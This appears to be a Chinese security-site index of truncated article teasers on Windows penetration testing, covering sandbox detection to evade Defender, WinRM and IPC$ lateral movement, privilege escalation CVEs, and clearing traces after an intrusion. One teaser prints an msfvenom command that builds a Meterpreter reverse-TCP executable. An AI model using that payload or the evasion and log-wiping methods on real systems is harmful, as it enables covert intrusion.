wsb-detect概述wsb-detect可以帮助广大研究人员判断应用程序当前是否在Windows Sandbox(WSB)中运行。众所周知,Windows Defender会使用沙盒来进行动态分析...
RedTips之使用WSB绕过defender
什么是WSB?全称Windows Sandbox:一个独立的临时桌面环境,可以在其中运行不受信任的软件,而不必担心会对您的PC产生持久影响。Windows Sandbox中安装的任何软件仅保留在沙箱中...
横向移动之WinRM横向移动
WinRM的简要概述"Windows远程管理(WinRM)"是WS-Management协议(Web Services for Management,又名WSMan)的Microsoft实现,WS-M...
Windows局域网渗透(IPC$管道)
文章来源:LemonSec黑客技术——ipc$命令所使用的端口首先我们来了解一些基础知识:1.SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;2.N...
RogueWinRM - Windows本地权限升级从服务账户到系统
RogueWinRM - Windows本地权限升级从服务账户到系统 本文始发于微信公众号(Khan安全团队):RogueWinRM - Windows本地权限升级从服务账户到系统
记一次排查PHP上传目录配置的经历
最近在本地调试上传的文件,我发现了一个非常不好的”特征“,大家猜猜是什么:是的,临时文件居然被放在了Windows系统目录下,对于有轻微”洁癖“的我来说是不可以接受的,我想知道这是什么原因。首先,我本...
反弹入侵(几乎适用于任何windows主机)((请勿用于非法操作!!!))
root@kali:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe&...
在Windows Servers部署服务中查找漏洞
介绍许多大型组织使用Windows部署服务(WDS)在网络中的新计算机上安装自定义操作系统。从本质上讲,Windows部署服务通常可通过LAN端口连接的任何人访问,并提供相关软件。它们确定操作系统以及...
后渗透阶段清理痕迹方式总结
一、前言在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。二、windows有远程桌面权限时手动删除日志:1开...
“勒索病毒2.0”来袭预警!Windows远程桌面高危漏洞应急措施
背景:2019年5月14日微软官方发布紧急安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(漏洞编号为CVE-2019-0708),攻击者可利用此漏洞无需用户交互直接获取Windows...
CVE-2020-0986 Windows: splWOW64 权限提升
Windows: splWOW64 权限提升平台:Windows 10 2004 (19041.508) Windows 10 2004 (19041.508)类。特权的提升摘要:在野外被利用的CVE...
利用系统溢出漏洞提权
溢出漏洞提权是利用目标操作系统层漏洞进行权限提升,通常步骤是拿到shell后获取目标机器的补丁信息,通过目标的补丁情况获取相对应的漏洞,进行提权一、Windows 溢出提权#Windows查看补丁信息...
169